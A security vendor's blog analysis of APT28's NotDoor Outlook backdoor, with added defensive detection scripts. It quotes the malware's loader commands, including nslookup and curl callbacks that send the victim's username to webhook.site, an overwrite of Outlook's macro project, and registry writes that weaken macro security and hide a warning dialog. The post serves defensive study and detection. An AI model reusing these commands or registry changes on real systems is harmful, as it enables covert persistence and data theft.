NotDoor Backdoor Analysis Uncovering APT28 Data Theft

Written by Picus Labs | Dec 2, 2025 8:00:00 AM

A novel backdoor targeting Microsoft Outlook, identified as "NotDoor" and also known as Cordyceps or GONEPOSTAL, has been attributed to the persistent threat group APT28. This group is linked to Russian intelligence services and has a history of compromising companies across various sectors in NATO member countries. The malware functions as a VBA macro designed to monitor incoming emails for specific trigger words, enabling attackers to exfiltrate data, upload files, and execute commands on compromised systems.

In this blog, we will analyze the infection chain of this new backdoor attributed to the APT28 group, detailing the DLL side-loading technique that exploits a legitimate Microsoft OneDrive binary. We will further examine the persistence mechanisms established through Windows Registry modifications, the obfuscation tactics employed to evade detection, and the command-and-control infrastructure that leverages email-based triggers for data exfiltration.

What Techniques Does NotDoor Use?

The Loading Mechanism

To evade standard detection mechanisms, the backdoor is deployed via a legitimate, signed binary: Microsoft OneDrive.exe. The execution chain initiates when the legitimate process loads a malicious DLL named SSPICLI.dll. This DLL is responsible for disabling macro security protections and installing the VBA backdoor.

The attacker stages the backdoor payload at c:\programdata\testtemp.ini before the loader runs. The loader then executes three Base64-encoded PowerShell commands to finish the installation and confirm that it worked [1].

  1. Payload Installation: The first command copies the staged file over Outlook's VBA project file, VbaProject.OTM, under %APPDATA%\Microsoft\Outlook. This file holds the macros that Outlook loads when it starts, so overwriting it plants the backdoor without ever opening the VBA editor.

$a=$env:APPDATA;copy c:\programdata\testtemp.ini "$a\Microsoft\Outlook\VbaProject.OTM"

  2. Execution Verification (DNS Hook): The second command runs nslookup against a hostname built from the victim's username under dnshook[.site, the DNS-callback endpoint of webhook.site, a service previously observed in this group's campaigns. The resulting DNS query tells the attacker that the code ran on that specific machine.

nslookup "$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook[.site"

  3. Execution Verification (HTTP Request): The third command performs the same check over HTTP by invoking curl against the matching webhook.site URL, again passing the username as the query string.

cmd /c curl "hxxp://webhook[.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME"
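The three commands above only show up in endpoint telemetry as an opaque Base64 blob on the powershell.exe command line, so the first thing a responder does is decode them. The script below is an added example, not code from the page or from the malware: it wraps the page's three commands the way powershell.exe -EncodedCommand expects them (UTF-16LE, then Base64; the page only says "encoded in Base64", so that convention is our assumption), decodes such a blob back out of a constructed process-creation line, and flags the four behaviours those commands exhibit. The defanged "hxxp" and "[.site" spellings are kept exactly as the page prints them.

```python
import base64
import re
from typing import Dict, List, Optional

# The three loader commands as the page prints them (defanged spellings kept).
# Wrapping them as UTF-16LE Base64 is our reconstruction of the usual
# powershell.exe -EncodedCommand convention; the page does not state it.
LOADER_COMMANDS: List[str] = [
    r'$a=$env:APPDATA;copy c:\programdata\testtemp.ini "$a\Microsoft\Outlook\VbaProject.OTM"',
    r'nslookup "$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook[.site"',
    r'cmd /c curl "hxxp://webhook[.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME"',
]


def encode_command(cmd: str) -> str:
    """-EncodedCommand takes Base64 of the UTF-16LE script text, not of UTF-8."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Inverse of encode_command: what an analyst does with a logged -enc blob."""
    return base64.b64decode(blob).decode("utf-16-le")


# One regex per behaviour seen in the loader commands above.
INDICATORS: Dict[str, "re.Pattern"] = {
    "otm_write": re.compile(r"VbaProject\.OTM", re.I),
    "programdata_stage": re.compile(r"programdata\\testtemp\.ini", re.I),
    "dns_callback": re.compile(r"nslookup\s+\S*dnshook", re.I),
    "http_callback": re.compile(r"curl\s+\S*webhook", re.I),
}

# Longest alias first so "-enc" is not cut short at "-e".
_ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def extract_encoded_arg(cmdline: str) -> Optional[str]:
    """Pull the Base64 argument out of a process command line, if there is one."""
    m = _ENC_ARG.search(cmdline)
    return m.group(1) if m else None


def triage(cmdline: str) -> Dict[str, object]:
    """Decode the line if it is encoded and report which loader behaviours it shows."""
    blob = extract_encoded_arg(cmdline)
    decoded = decode_encoded_command(blob) if blob else cmdline
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"decoded": decoded, "hits": hits}


# Constructed process-creation lines (not real telemetry) in the shape an EDR logs them.
SAMPLE_EVENTS: List[str] = [
    "powershell.exe -NoProfile -NonInteractive -enc " + encode_command(c)
    for c in LOADER_COMMANDS
]


if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        result = triage(line)
        print(result["hits"], "<-", result["decoded"])
```

Run stand-alone, the script prints the decoded command next to the indicator names it matched. The same triage function works on any -enc blob pulled from Sysmon event 1 or from a 4688 event with command-line auditing enabled; a line that writes VbaProject.OTM from a ProgramData path, or that pairs nslookup or curl with a webhook.site hostname, is worth an alert regardless of what else it contains.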

Persistence and Registry Manipulation

The loader establishes persistence and modifies the environment to ensure the malicious macros run without user interference.

Enabling Macros on Boot

The LoadMacroProviderOnBoot value is set to 1 so that Outlook loads the VBA project (VbaProject.OTM) every time the application starts. The decompiled code shows the corresponding RegSetKeyValueW call against the Software\Microsoft\Office\16.0\Outlook key under HKEY_CURRENT_USER [1]:

// Decompiler output [1]. sub_180001D60 initialises a wide-string object; the "> 7"
// tests select the heap buffer over the inline one (consistent with MSVC std::wstring).
sub_180001D60(lpValueName, L"LoadMacroProviderOnBoot");
sub_180001D60(Block, L"Software\\Microsoft\\Office\\16.0\\Outlook");
Data = 1;                                   // DWORD data to write
v8 = (const WCHAR *)lpValueName;
if ( v28 > 7 )
  v8 = lpValueName[0];
v9 = Block;
if ( v25 > 7 )
  v9 = (void **)Block[0];
// HKCU\Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot = 1
// (dwType 4 = REG_DWORD, cbData 4)
RegSetKeyValueW(HKEY_CURRENT_USER, (LPCWSTR)v9, v8, 4u, &Data, 4u);

The VBA project itself hooks the Application_MAPILogonComplete and Application_NewMailEx events (which Outlook raises only for code in ThisOutlookSession), so the backdoor runs once Outlook has finished logging on to the mail profile and again whenever a new message arrives [1].

Disabling Security Protections

To bypass macro security warnings, the loader writes the Level value under Software\Microsoft\Office\16.0\Outlook\Security [2]. The code sets it to 1, Outlook's least restrictive macro setting, so the planted project runs without prompting the user [1].

// Same pattern as above, now targeting the Security subkey [1].
sub_180001D60(lpValueName, L"Level");
sub_180001D60(Block, L"Software\\Microsoft\\Office\\16.0\\Outlook\\Security");
Data = 1;                                   // least restrictive macro level
v12 = (const WCHAR *)lpValueName;
if ( v28 > 7 )
  v12 = lpValueName[0];
v13 = Block;
if ( v25 > 7 )
  v13 = (void **)Block[0];
// HKCU\Software\Microsoft\Office\16.0\Outlook\Security\Level = 1 (REG_DWORD)
RegSetKeyValueW(HKEY_CURRENT_USER, (LPCWSTR)v13, v12, 4u, &Data, 4u);

Suppressing Dialogs

A further write targets the PONT_STRING value under Software\Microsoft\Office\16.0\Outlook\Options\General [2]. This value stores the comma-separated list of dialog identifiers the user has dismissed with "Don't show this message again". By writing "32," to it, the loader marks the dialog with identifier 32 as already dismissed, so a pop-up that might otherwise alert the user to the unauthorized change never appears.

// Three strings this time: the data ("32,"), the value name and the key path [1].
sub_180001D60(lpValueName, L"32,");
sub_180001D60(v26, L"PONT_STRING");
sub_180001D60(Block, L"Software\\Microsoft\\Office\\16.0\\Outlook\\Options\\General");
lpData = lpValueName;
if ( v25 > 7 )
  lpData = (LPCWSTR *)lpValueName[0];
v14 = (const WCHAR *)v26;
if ( v27 > 7 )
  v14 = v26[0];
v15 = Block;
if ( v22 > 7 )
  v15 = (void **)Block[0];
// HKCU\...\Outlook\Options\General\PONT_STRING = L"32," (dwType 1 = REG_SZ);
// cbData is the wide-character length times 2 plus the 2-byte terminator.
RegSetKeyValueW(HKEY_CURRENT_USER, (LPCWSTR)v15, v14, 1u, lpData, 2 * v24 + 2);
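The three registry writes above give a compact hunting checklist: any user hive where Outlook auto-loads its VBA project, runs macros at the least restrictive level and has dialog 32 pre-dismissed looks exactly like a NotDoor install. The following is an added example, our own code rather than anything from the page or the malware, that evaluates such a snapshot together with the two file paths the loader touches. On Windows it can read the live HKCU values through winreg; elsewhere it runs against a constructed snapshot so the logic can be exercised offline. The mapping of Level=1 to "least restrictive" follows the page's description of the change; the finding texts are ours.

```python
import sys
from typing import Any, Dict, List, Set

OUTLOOK_KEY = r"Software\Microsoft\Office\16.0\Outlook"

# Value paths relative to OUTLOOK_KEY, exactly the three the loader writes (per the page).
WATCHED_VALUES = ["LoadMacroProviderOnBoot", r"Security\Level", r"Options\General\PONT_STRING"]


def audit_outlook_values(values: Dict[str, Any]) -> List[str]:
    """Evaluate a snapshot of HKCU Outlook values keyed by the relative paths above."""
    findings: List[str] = []
    if values.get("LoadMacroProviderOnBoot") == 1:
        findings.append("LoadMacroProviderOnBoot=1: VbaProject.OTM is loaded when Outlook starts")
    if values.get(r"Security\Level") == 1:
        findings.append(r"Security\Level=1: least restrictive macro setting, macros run without a prompt")
    pont = values.get(r"Options\General\PONT_STRING")
    if isinstance(pont, str):
        # PONT_STRING is a comma-separated list of dismissed dialog identifiers.
        dismissed = {p.strip() for p in pont.split(",") if p.strip()}
        if "32" in dismissed:
            findings.append("PONT_STRING lists dialog 32: an Outlook warning dialog is pre-dismissed")
    return findings


def audit_staged_files(existing_paths: Set[str], appdata: str) -> List[str]:
    """Check a set of paths (case-insensitive) for the loader's staging file and its target."""
    paths = {p.lower() for p in existing_paths}
    findings: List[str] = []
    if r"c:\programdata\testtemp.ini" in paths:
        findings.append(r"staging file c:\programdata\testtemp.ini present")
    if (appdata + r"\Microsoft\Outlook\VbaProject.OTM").lower() in paths:
        # Legitimate whenever the user has any Outlook macros, so this is a review item,
        # not a verdict on its own.
        findings.append("VbaProject.OTM present: review its contents unless the user is known to use macros")
    return findings


def collect_live_values() -> Dict[str, Any]:
    """Windows only: read the watched values from HKCU. Returns {} elsewhere or when absent."""
    if sys.platform != "win32":
        return {}
    import winreg  # only importable on Windows
    out: Dict[str, Any] = {}
    for rel in WATCHED_VALUES:
        sub, _, name = rel.rpartition("\\")
        path = OUTLOOK_KEY + ("\\" + sub if sub else "")
        try:
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
                out[rel], _ = winreg.QueryValueEx(key, name)
        except OSError:
            continue
    return out


# Constructed snapshot (not from a real host) reproducing the loader's three writes.
CONSTRUCTED_SNAPSHOT: Dict[str, Any] = {
    "LoadMacroProviderOnBoot": 1,
    r"Security\Level": 1,
    r"Options\General\PONT_STRING": "32,",
}


if __name__ == "__main__":
    snapshot = collect_live_values() if sys.platform == "win32" else CONSTRUCTED_SNAPSHOT
    for finding in audit_outlook_values(snapshot):
        print("[!]", finding)
```

A single finding is weak evidence (administrators do lower macro levels, and PONT_STRING grows whenever a user ticks "Don't show this again"); all three together, or any of them alongside the testtemp.ini staging file, is the combination to alert on. The path checks are deliberately limited to the two files the page names; the page does not say where the malicious SSPICLI.dll is dropped, so that is left to the responder.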

Obfuscation and Evasion Techniques

To hinder analysis, the VBA project is heavily obfuscated. Variable and function names are replaced with random alphabetic strings, and internal strings use an encoding of their own: a run of random alphanumeric characters is prepended to an otherwise valid Base64 string, so the blob no longer decodes as-is and the code must first strip a fixed number of leading characters [1]. An example from the sample:

ztwkgbsShBFETNo = 6000
zFwFYJLbRRNeBKb = "Nothing"
evnDTwIHumUhLMY = "oQNFwDdmfdvnOnYQAuAG0AYQB0AHQAaQA0ADQANABAAHAAcgBvAHQAbwBuAC4AbQB1AA=="
' Mid() skips the first hywLHvMvcAEpWDW random characters; lcOLQUZAruDrLrW decodes the remaining Base64
evnDTwIHumUhLMY = lcOLQUZAruDrLrW(Mid(evnDTwIHumUhLMY, hywLHvMvcAEpWDW + 1))
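Stripping the prefix is trivial once the length constant is known, but an analyst looking at a fresh sample usually does not have it yet. The script below is an added example (our code, not the malware's or the page's) that reproduces the scheme on a constructed string and then recovers the prefix length by brute force: it tries every cut that leaves a padding-correct Base64 tail and keeps the cuts that decode to printable text. The plaintext encoding (UTF-8 for our sample, with a UTF-16LE fallback since VBA strings are UTF-16 in memory) is our assumption; the page does not state what the decoded bytes contain.

```python
import base64
import binascii
import random
import string
from typing import List, Optional, Tuple

_ALPHANUM = string.ascii_letters + string.digits


def obfuscate(plain: str, prefix_len: int, seed: int = 0) -> str:
    """Reproduce the page's scheme: Base64 of the text with prefix_len random
    alphanumerics in front. UTF-8 plaintext is our assumption, not the page's."""
    rng = random.Random(seed)
    prefix = "".join(rng.choice(_ALPHANUM) for _ in range(prefix_len))
    return prefix + base64.b64encode(plain.encode("utf-8")).decode("ascii")


def deobfuscate(blob: str, prefix_len: int) -> str:
    """Mirror of the VBA's Mid(s, n + 1): drop n characters, then Base64-decode."""
    return base64.b64decode(blob[prefix_len:], validate=True).decode("utf-8")


def _as_text(raw: bytes) -> Optional[str]:
    """Accept UTF-16LE when every high byte is zero, otherwise strict UTF-8;
    either way the result must be non-empty and printable."""
    if raw and len(raw) % 2 == 0 and not any(raw[1::2]):
        text = raw.decode("utf-16-le")
    else:
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            return None
    return text if text and text.isprintable() else None


def recover_prefix_len(blob: str) -> List[Tuple[int, str]]:
    """Without the length constant: try every cut that leaves a padding-correct
    Base64 tail and keep the cuts that decode to printable text, earliest first."""
    hits: List[Tuple[int, str]] = []
    for n in range(len(blob)):
        tail = blob[n:]
        if len(tail) % 4:
            continue  # cannot be a complete Base64 string
        try:
            raw = base64.b64decode(tail, validate=True)
        except (binascii.Error, ValueError):
            continue
        text = _as_text(raw)
        if text is not None:
            hits.append((n, text))
    return hits


if __name__ == "__main__":
    # Constructed sample: the analyzed sample's trigger phrase behind a 14-character prefix.
    blob = obfuscate("Daily Report", 14)
    print(blob)
    print(deobfuscate(blob, 14))
    for n, text in recover_prefix_len(blob):
        print(f"cut at {n:2d}: {text!r}")
```

Because the prefix is drawn from Base64's own alphabet, several cuts decode cleanly: the real one, plus every later cut that lands on a 3-byte boundary and therefore yields a suffix of the same text ("ly Report", "Report", ...). The earliest cut that gives coherent text is the one to take, and once it is known for one string it is the same constant for every string in the project.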

Operational Behavior and Exfiltration

Upon a successful login event, the malware creates a working directory at %TEMP%\Temp. This folder acts as a staging ground for artifacts. If files exist in this directory during startup, the malware attempts to exfiltrate them immediately. These files are emailed to a.matti444@proton[.me [1].

The backdoor also parses incoming emails for a specific string located on a designated line. In the analyzed sample, the trigger phrase is "Daily Report". However, the code structure allows for configurable triggers [1].

' Trigger list: a single obfuscated entry in this sample, decoded at runtime
Dim QZAiyhHDeDiozCo() As String
ReDim QZAiyhHDeDiozCo(0)
QZAiyhHDeDiozCo(0) = "QWVu..." ' Daily Report

Once the trigger is identified, the email is parsed for commands and subsequently deleted to remove evidence.

The tasking emails must follow a strict line structure after the trigger line, or the backdoor ignores them:

  • ID: a numerical identifier, echoed back in the subject of the response.
  • Number of commands: how many command lines follow.
  • Recipient: the address that receives the results, encrypted with the malware's custom encryption algorithm.
  • Commands: one or more commands, encrypted with the same custom algorithm.

Example trigger email [1]:

Lorem ipsum dolor sit amet...
[...truncated text...]
Daily Report             <-- Trigger
1234                     <-- ID
2                        <-- Number of commands
1fhVwhCk7eRzFGTgBvAHQAaABpAG4AZwA=  <-- Encrypted Recipient
291Y1UCBEY6Uz0dQ...      <-- Encrypted Commands
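That fixed layout cuts both ways: it is rigid enough that a mail gateway or a mailbox sweep can recognise a tasking message by shape alone, without decrypting anything. The parser below is an added example written for this post, not the backdoor's own VBA, and it runs on a constructed message whose encrypted fields are placeholder tokens. Two points are our reading rather than the page's statement: the trigger is matched as a whole line, and each command occupies one line (the page's example is truncated after the first). The custom encryption of the recipient and commands is not described, so those fields are validated for shape and returned opaque.

```python
import re
from typing import Dict, List, Optional

TRIGGER = "Daily Report"  # the analyzed sample's trigger; the VBA keeps it configurable
_FIELD = re.compile(r"^[A-Za-z0-9+/=]{8,}$")  # shape check only; the fields stay opaque here
_RESULT_SUBJECT = re.compile(r"^Re:\s*(\d+)\s+(.+)$")  # "Re: <ID> <EMAIL SUBJECT>"


def parse_tasking(body: str, trigger: str = TRIGGER) -> Optional[Dict[str, object]]:
    """Return the tasking fields if body has the documented layout, else None.
    After the trigger line: ID, number of commands, encrypted recipient, then that
    many encrypted command lines (one per line is our assumption)."""
    lines = [ln.strip() for ln in body.splitlines()]
    if trigger not in lines:
        return None
    rest = [ln for ln in lines[lines.index(trigger) + 1:] if ln]
    if len(rest) < 4 or not (rest[0].isdigit() and rest[1].isdigit()):
        return None
    count = int(rest[1])
    recipient, commands = rest[2], rest[3:3 + count]
    if count < 1 or len(commands) != count:
        return None  # declared count does not match what follows
    if not all(_FIELD.match(f) for f in [recipient, *commands]):
        return None
    return {"id": int(rest[0]), "recipient_enc": recipient, "commands_enc": commands}


def is_result_subject(subject: str, task_id: Optional[int] = None) -> bool:
    """Match the outbound subject the page documents, optionally for a specific task ID."""
    m = _RESULT_SUBJECT.match(subject)
    return bool(m) and (task_id is None or int(m.group(1)) == task_id)


# Constructed tasking mail (not a real capture); the encrypted fields are placeholder tokens.
SAMPLE_BODY = """Hi team,
Lorem ipsum dolor sit amet, consectetur adipiscing elit.
Daily Report
1234
2
YWJjZGVmZ2hpamtsbW5vcA==
cXJzdHV2d3h5ejAxMjM0NQ==
Zm9vYmFyYmF6cXV4MTIzNA==
"""


if __name__ == "__main__":
    task = parse_tasking(SAMPLE_BODY)
    print(task)
    if task:
        print(is_result_subject("Re: 1234 Daily Report", task["id"]))
```

Pairing the two functions gives a useful correlation on the mail server: an inbound message that parses as a tasking and, shortly after, an outbound reply from the same mailbox whose subject starts with "Re: <that ID>" going to an address the user has never written to. Either half alone can be benign; together they are the backdoor's request and response.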

The backdoor supports four primary functions: executing system commands with the output returned as an attachment, running commands silently without returning data, exfiltrating files from the victim machine, and uploading files directly onto the target system [1].

Results are sent back to the attacker with a subject line formatted as: Re: <ID> <EMAIL SUBJECT> [1].

How Does Picus Simulate NotDoor Backdoor Attacks?

We strongly suggest simulating NotDoor backdoor attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other backdoors, such as RomCom, BRICKSTORM, YiBackdoor, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threat for the NotDoor Backdoor Campaign:

Threat ID   Threat Name                   Attack Module
70868       GONEPOSTAL Malware Campaign   Windows Endpoint

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Key Takeaways

  • NotDoor is a VBA macro backdoor deployed through DLL side-loading: a legitimate OneDrive.exe loads a malicious SSPICLI.dll.
  • The loader installs the payload over VbaProject.OTM, lowers Outlook's macro security, and verifies execution through Base64-encoded PowerShell commands using DNS and HTTP callbacks.
  • Persistence is achieved by modifying Outlook registry values to auto-load the VBA project, weaken macro security, and pre-dismiss a warning dialog.
  • The malware employs obfuscation through randomized identifiers and Base64 strings hidden behind a random prefix, along with a working directory under %TEMP% for staging data.
  • Exfiltration and command execution are triggered by specially crafted incoming emails carrying an ID, a command count, and an encrypted recipient and commands.
  • Supported operations include command execution, silent tasking, file exfiltration, and file upload, with results returned to the attacker via email.

References

[1] “Analyzing NotDoor: Inside APT28’s Expanding Arsenal.” Accessed: Nov. 18, 2025. [Online]. Available: https://lab52.io/blog/analyzing-notdoor-inside-apt28s-expanding-arsenal/

[2] R. Tait, “NotDoor Insights: A Closer Look at Outlook Macros and More,” Splunk. Accessed: Nov. 18, 2025. [Online]. Available: https://www.splunk.com/en_us/blog/security/notdoor-insights-a-closer-look-at-outlook-macros-and-more.html